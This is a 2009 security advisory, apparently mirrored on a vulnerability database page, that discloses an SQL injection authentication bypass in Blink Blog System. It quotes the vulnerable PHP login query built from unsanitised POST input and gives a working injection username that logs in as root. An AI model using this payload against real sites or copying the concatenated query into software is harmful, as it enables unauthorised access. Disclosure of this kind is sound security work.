Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22248
HistoryAug 03, 2009 - 12:00 a.m.

Blink Blog System Authentication Bypass

2009-08-0300:00:00
vulners.com
16

******** Salvatore "drosophila" Fresta ********

[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 03 Aug 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


[+] Menu

1) Bugs
2) Code
3) Fix


[+] Bugs

There are many SQL Injection flaws but I post the
only one that allows a guest to bypass the login.

  • [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php

This bug allows a guest to bypass the login.

login.php:

    ...
    
    $username = $_POST["nick"];
$password = md5($_POST["password"]);
if ($data = $DB->usercheck($username, $password))

...

db.php:

    function usercheck($username, $password)
{
    $try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND

password=\"".$password."\" ");

...

[+] Code

  • [A] Authentication Bypass

username: root"#
password: foo


[+] Fix

No fix.